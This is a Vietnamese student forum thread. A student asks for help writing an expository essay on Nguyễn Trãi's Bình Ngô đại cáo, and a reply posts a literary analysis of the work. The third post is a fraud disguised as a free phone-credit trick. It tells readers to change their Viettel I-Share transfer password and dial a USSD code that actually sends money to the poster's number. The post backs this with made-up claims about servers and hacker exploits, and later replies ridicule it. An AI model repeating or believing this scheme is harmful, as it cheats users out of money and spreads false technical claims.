Thông báo khen thưởng thành viên tháng 10/2016

Chào mừng bạn đến với HMForum. Vui lòng đăng nhập để sử dụng nhiều chức năng hơn!

BV số 4 - Văn Thuyết Minh - Đoạn 2 bài Bình Ngô

Thảo luận trong 'Thảo luận chung' bắt đầu bởi butchi123, 12 Tháng hai 2012.

CHIA SẺ TRANG NÀY

Lượt xem: 12,564

 1. butchi123

  butchi123 Guest

  Mở thêm 5000 cơ hội nhận ưu đãi học phí - Click ngay!

  > Đăng ký gia nhập BQT DIỄN ĐÀN


  Mấy bác ai có cho em xin với!
  Đề là Thuyết minh Đoạn 2 bài Bình Ngô đại cáo
  (cái đề nghe kì quá). giúp em với! Thứ phải nộp bài rồi!...
   
 2. duyenkute93

  duyenkute93 Guest


  Mình sưu tầm đc
  I. VÀI VẤN ĐỀ CHUNG

  1. Hoàn cảnh ra đời:

  Cuối năm 1427, Vương Thông, tên tổng chỉ huy quân đội nhà Minh ở Việt Nam, đã phải mở cửa thành Ðông Quan đầu hàng. Cuộc kháng chiến 10 năm đã kết thúc vẻ vang. Thay mặt vua Lê, Nguyễn Trãi viết bài cáo nhằm tổng kết quá trình kháng chiến và tuyên cáo thành lập triều đại mới. 2. Về thể loại Cáo:

  Nếu văn học động viên mọi người chiến đấu thì văn Cáo lại có ý nghĩa tuyên ngôn nhằm công bố cho mọi người biết những chủ trương chính trị trọng đại của toàn dân tộc như việc xác lập hòa bình, đánh đuổi giặc ngoại xâm và xây dựng vương triều mới.

  Cáo viết bằng thể văn biền ngẫu, số câu chữ không hạn chế, văn phong mang tính chính luận nên trang trọng, sắc bén, lập luận chặt chẽ, giàu sức thuyết phục.

  Kết cấu của bài đại cáo bình Ngô tuân thủ đúng kết cấu của các tác phẩm Thang cáo (được chép trong chương Thương Thư của sách Kinh Thư) và Vũ cáo hay đại cáo Vũ Thành (được chép trong chương Chu thư của sách Kinh Thư).

  3. Về tựa đề bài Cáo:

  Những quan niệm khác nhau về ý nghĩa của chữ Ngô trong Bình Ngô đại cáo

  - Ngô: Một cách gọi theo thói quen của người Việt Nam thời đó để chỉ chung người trung Quốc.

  - Ngô: tên vùng đất xuất thân của Chu Nguyên Chương (tức Minh Thành tổ).

  - Ngô: Một cách gọi của nhân dân để chỉ những tên giặc gian ác, tàn bạo.

  II. PHÂN TÍCH

  1. Nêu luận đề chính nghĩa:

  - Luận đề này được xây dựng dựa trên cơ sở mối quan hệ giữa 3 yếu tố: Nhân nghĩa, dân và nước:

  + Nhân nghĩa: điếu dân phạt tội, bênh vực cho kẻ khốn cùng, chống lại các thế lực phi nhân.

  + Dân: Dân trong tác phẩm là những người thuộc tầng lớp thấp nhất nhưng lại chiếm đa số trong xã hội nông nghiệp thời đó. Ðó là những dân đen, con đỏ, thương sinh, phu phen, manh lệ, những người có vai trò lịch sử quan trọng, góp phần đánh đuổi giặc ngoại xâm và xây dựng đất nước.

  + Nước: Khái niệm nước bao gồm mối quan hệ hữu cơ giữa các yếu tố

  Văn hiến
  Ðịa lý
  Phong tục tập quán
  Các triều đại chính trị
  Hào kiệt
  Truyền thống lịch sử vẻ vang
  Những quan niệm của Nguyễn Trãi trong bài Cáo về Nhân nghĩa, Dân, Nước đều xuất phát từ chính thực tiễn kế thừa phát triển của truyền thống yêu nước, phù hợp với đạo đức truyền thống và hoàn cảnh lịch sử đương thời. Những quan niệm này, so với trước, đã có nhiều biến đổi, phát triển do sự chi phối của hoàn cảnh lịch sử.

  2. Vạch trần tội ác giặc:

  Các nhà nghiên cứu xem đoạn văn này là một bản cáo trạng đanh thép tố cáo tội ác khủng khiếp của giặc Minh trong 20 năm trên mảnh đất Ðại Việt.

  Ðể đảm bảo vừa tăng cường sức thuyết phục vừa đạt được tính cô đọng, hàm súc của ngôn từ văn chương, Nguyễn Trãi sử dụng đan xen, kết hợp hàihòa giữa những hình ảnh mnag tính chất khái quát với những hình ảnh có tính cu, sinh động.

  3. Tổng kết quá trình kháng chiến:

  a. Hình ảnh của Lê Lợi buổi đầu kháng chiến

  Tập trung miêu tả hình ảnh Lê Lợi, Nguyễn Trãi đã khái quát toàn vẹn nưng phẩm chất tiêu biểu nhất của con người yêu nước ở thế kỷ XV. Những đặc điểm của con người yêu nước trong văn học thời kỳ này thường có đặc điểm sau:

  - Xuất thân bình thường:

  Ta đây
  Núi Lam Sơn dấy nghĩa
  Chốn hoang dã nương mình
  - Có tấm lòng căn thù giặc sâu sắc:

  Ngẫm thù lớn há đội trời
  Căm giặc nước thề không cùng sống
  - Khở đầu gặp nhiều khó khăn nhưng luôn có tinh thần vượt khó, kiên trì:

  Trời thử lòng trao cho mệnh lớn
  Ta gắng chí khắc phục gian nan
  - Biết tập hợp, đoàn kết toàn dân:

  Nhân dân bốn cõi một nhà dựng cần trúc ngọn cờ phất phới
  Tướng sĩ một lòng phụ tử hòa nước sông chén rượu ngọt ngào
  - Biết sử dụng chiến lược, chiến thuật tài tình:

  Thế trận xuất kỳ lấy yếu chống mạnh
  Dùng quân mai phục lấy ít địch nhiều
  - Biết nêu cao ngọn cờ nhân nghĩa trong mọi hoạt động:

  Ðem đại nghĩa để thắng hung tàn
  Lấy chí nhân mà thay cường bạo
  Có thể nói, Lê Lợi chính là hình ảnh tiêu biểu của những con người yêu nước dám hy sinh quên mình đứng dậy chống ngoại xâm, bảo vệ độc lập tự do của dân tộc.

  b. Miêu tả quá trình kháng chiến

  - Ở đây, ta không tìm thấy những anh hùng cá nhân trong văn chương trung đại hay trong các tác phẩm anh hùng ca của Hy Lạp cổ đại. Bài Cáo tập trung làm sáng rõ vai trò của một tập thể anh hùng, những người mà trước kia văn học bác học chưa quan tâm đi sâu, khai thác

  - Tuy nhiên, đối với tướng giặc, tác giả lại miêu tả đầy đủ, cụ thể từng gương mặt, họ tên, chức tước và tư thế thất bại của từng tên một.

  - Cách sử dụng liệt kê ngày tháng thể hiện rõ nhịp độ dồn dập của những trận chiến thắng.

  4. Tuyên bố hòa bình, xây dựng vương triều mới:

  - Nhịp thơ dàn trải, trang trọng

  - Khẳng định thế thịnh suy tất yếu
   
 3. thaodaik

  thaodaik Guest


  Cách **** tiền điện thoại viettel


  Hôm nay mình giới thiệu cho các bạn 1 cách kiếm tiền trên điện thoại di động rất dễ dàng. Bạn nào hứng thú thì có thể xem .
  Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:
  1 -Một sim Viettel hoạt động trên 450 ngàyTại sao phải cần vậy? Vì chỉ có những sim hoạt dộng trên 450 ngày mới được Viettel đưa vào mã bảo vệ tài khoản riêng và không bị quản lí gắt gao( 6 tháng chưa được đâu các bạn) trên server Viettel quản lí.
  2 -Rất đơn giản : Soạn tin MK gửi tới 136 để lấy mât khẩu chuyển tiền của bạn( nếu bạn chưa có).Tại sao phải cần vậy ? Vì chúng ta **** thông qua dịch vụ I-Share của Viettel.
  3 -Ðổi mật khẩu chuyển tiền: các bạn gọi tới 900 ,nhánh phím số 3 và làm theo hướng dẫn..và điều quan trọng nằm ở bước này. Các bạn phải đổi mât khẩu chuyển tiền thành dãy số sau :10010010 ,đó chính là mật khẩu Server trung gian ở bước 5. Tại sao phải làm vậy ? Vì khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên Server mà Viettel quản lý.Ðiều này rất quan trọng.
  4 -Tài khoản trong sim của bạn phải có nhiều hơn 21999 vnd
  5 -Các bạn làm theo cú pháp nhu sau: *136* mật khẩu Server *mã PIN *mã PUK#. Để khỏi mất thời gian của các bạn tìm lại 2 mã pin và mã puk trên nên tôi đã tạo ra một Server trung gian ( viết tắt là TIS-Telephone of Intermediacy Server) với mã PIN và mã PUK mặc định (dùng đăng nhập sdt của bạn trên Server),
  Tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Viettel):
  + mật khẩu Server: 10010010
  + mã PIN : 841662050352
  + mã PUK: 20000
   *136*10010010*841662050352*20000#
  Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp và nhấn nút gọi thì hệ thống sẽ tự động đăng nhập sdt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sdt người gửi sẽ tự đông được công thêm tiền **** được sau khi đăng nhập (tiền **** được sẽ công thêm vào tài khoản chính),thật ra đây là một trong những cách **** tài khoản điện thoại mà các Hacker chuyên nghiệp trên thế giới gần đây mới sử dụng ( nguyên lý là dùng mã **** đảo chiều các dịch vụ chuyển tiền từ các Server di đông,chẳng hạn như I-Share, hiên trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).
  6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút , sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 200000 vnd.( lưu ý 200000vnd sẽ được cộng trực tiếp vào tài khoản chính của bạn)
  +Tôi **** được tài khoản của mạng di động viettel từ 1 lỗ hổng nhỏ trên I-Share và những lần tôi test gần đây đều thành công.Thông báo sever trung gian ma tôi tao ra cũng là sevsr duy nhất hoạt động có hiệu quả hiện nay).
  Tất cả chỉ có vậy nhưng đó chính là công sức bao lâu nay tôi khám phá.Các bạn hãy thử và cho tôi biết kết quả nếu như bản **** hoạt động tốt tôi sẽ mở thêm nhiều sever khác.
  Nhanh tay đi bạn.Mõi ngày chỉ được 4 lần thôi đó
   

 4. nek!!! nhận được money từ ai chưa??? :D :D :D k biết có ai ngây thơ k nhỉ? =((
   
 5. verychemgio

  verychemgio Guest


  01662050352 tối nay khỏi ngủ với mình nhe bạn hoặc là bẻ sim vứt đi heheheheh.......